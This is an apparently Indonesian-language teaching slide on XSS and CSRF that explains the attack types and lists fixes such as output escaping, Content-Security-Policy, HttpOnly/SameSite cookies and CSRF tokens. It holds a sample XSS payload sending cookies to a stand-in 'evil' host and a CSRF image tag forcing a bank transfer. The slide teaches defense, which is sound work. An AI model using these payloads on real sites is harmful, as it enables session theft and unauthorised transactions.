M Majuin.
6 6 / 10

XSS, CSRF & Client-Side Attacks

Kode penyerang berjalan di browser korban (OWASP A03/A07): - Reflected: payload di URL, langsung dipantulkan - Stored: payload tersimpan di server (paling berbahaya) - DOM-based: manipulasi DOM di sisi klien

  <script>fetch('//evil/'+document.cookie)</script>

CSRF memaksa korban mengirim request yang tidak dikehendaki:

  <img src="https://bank/transfer?to=attacker&amount=1000">

Perbaikan: - Escape output sesuai konteks (HTML, JS, URL, CSS) - Content-Security-Policy yang ketat - Cookie HttpOnly + SameSite - CSRF token per sesi - Framework modern (Vue/React) escape default — hindari v-html/dangerouslySetInnerHTML.